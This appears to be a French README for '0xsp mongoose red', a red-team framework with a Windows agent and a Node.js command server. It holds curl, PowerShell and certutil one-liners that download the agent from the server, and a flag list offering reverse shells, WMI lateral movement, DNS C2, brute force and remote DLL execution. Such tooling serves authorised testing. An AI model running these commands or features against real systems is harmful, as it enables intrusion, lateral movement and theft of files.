
un framework unique pour la simulation de cybersécurité et les opérations de red teaming, l'audit Windows pour les vulnérabilités récentes, les erreurs de configuration et les attaques d'escalade de privilèges, reproduire les tactiques et techniques d'un adversaire avancé dans un réseau.
Soutenez le projet pour un développement continu (ETH 0xf340c15c5e669a4ababab856e9f2bccd659d6e42)
Version actuelle 2.2.0
La version rouge de 0xsp mongoose est fournie pour répondre à vos besoins lors de simulations de cybersécurité. En utilisant cette version, vous pourrez auditer un système d'exploitation Windows ciblé à la recherche de vulnérabilités système, de mauvaises configurations et d'attaques d'escalade de privilèges, et reproduire les tactiques et techniques d'un adversaire avancé dans un réseau.
Grâce au support de Node.js pour l'API d'application web, l'installation et la personnalisation deviennent beaucoup plus faciles en temps voulu. L'agent capteur Windows communiquera avec l'API de l'application pour transférer les résultats et recevoir des commandes selon une technique bidirectionnelle.
L'agent est capable d'identifier et de détecter les exploits Windows en utilisant les modules windows update api et exploit database definitions. La nouvelle version détectera également les vulnérabilités suivantes.
git clone --single-branch --branch 0xsp-red https://github.com/lawrenceamer/0xsp-mongoose
cd 0xsp-mongoose/
npm install
node index.js
identifiants d'accès par défaut :
touch temp.txt
python3 dns_server.py -d DOMAIN -a PUBLICIP -i INTERFACEIP
#example 1
curl.exe -o agent.exe http://nodejsip:4000/release/x64.exe
#example 2
powershell.exe -command (new-object net.webclient).downloadfile('http://nodejsip:4000/release/x64.exe','c:\tmp\agent.exe');
#example 3
certutil.exe -urlcache -split -f "http://nodejsip:4000/release/x64.exe" agent.exe
-s --récupérer les services Windows et les pilotes installés.
-u --récupérer des informations sur les utilisateurs, groupes, rôles.
-c --rechercher dans les pilotes connectés des fichiers de configuration sensibles par extension.
-n --récupérer les informations réseau, interfaces réseau, détails de connexion.
-w --énumérer les répertoires accessibles en écriture, vérifier les permissions d'accès, permissions modifiées.
-i --énumérer les informations système Windows, sessions, vérification Always Elevated.
-l --rechercher une chaîne spécifique dans n'importe quel fichier, ex : agent.exe -l c:\ password *.config.
-o --spécifier l'adresse hôte de l'application nodejs, vous pouvez aussi utiliser srvhost
-p --énumérer les logiciels installés, processus en cours, tâches.
-e --outil d'inspection du noyau, il vous aidera à rechercher dans les bases de données d'outils les vulnérabilités du noyau Windows
-x --mot de passe pour autoriser votre connexion avec l'application node js.
-d --télécharger des fichiers directement dans la machine cible.
-t --télécharger des fichiers depuis la machine cible vers l'application node js.
-spooler --analyser un seul hôte ou une liste d'hôtes pour une possible CVE-2021-1675 (par ex. -spooler -srvhost ou -spooler -hosts )
-m --exécuter tous les types de scan connus ensemble.
[!] SECTION TACTIQUES RED TEAM
-r --générer un shell inversé avec un compte spécifique.
-lr --technique de mouvement latéral utilisant WMI (par ex. -lr -host 192.168.14.1 -username administrator -password blabla -srvhost nodejsip )
-nds --découverte réseau et énumération des partages
-dns --établir un shell interactif DNS C2C
-cmd --transférer des commandes via HTTP Shell
-interactive --démarrer le mode interactif (par ex. : chargement de plugins, etc.)
-username --authentification d'identité pour des modules d'attaque spécifiques.
-password --authentification d'identité pour des modules d'attaque spécifiques.
-host --identifier l'hôte distant pour mener une attaque.
-srvhost --définir le rhost de l'application node js.
-bf --module de brute force pour utilisateurs locaux / domaine
-import --importer et exécuter un fichier dll localement
-remote --importer et exécuter un fichier dll depuis un hôte distant
https://0xsp.com/security%20dev/0xsp-mongoose-red
Assurez-vous de vous abonner à la chaîne suivante pour être informé des nouveaux tutoriels et astuces publiés pour 0xsp https://www.youtube.com/channel/UCoEr6Qsyd6oMsPmaJPQ_FOg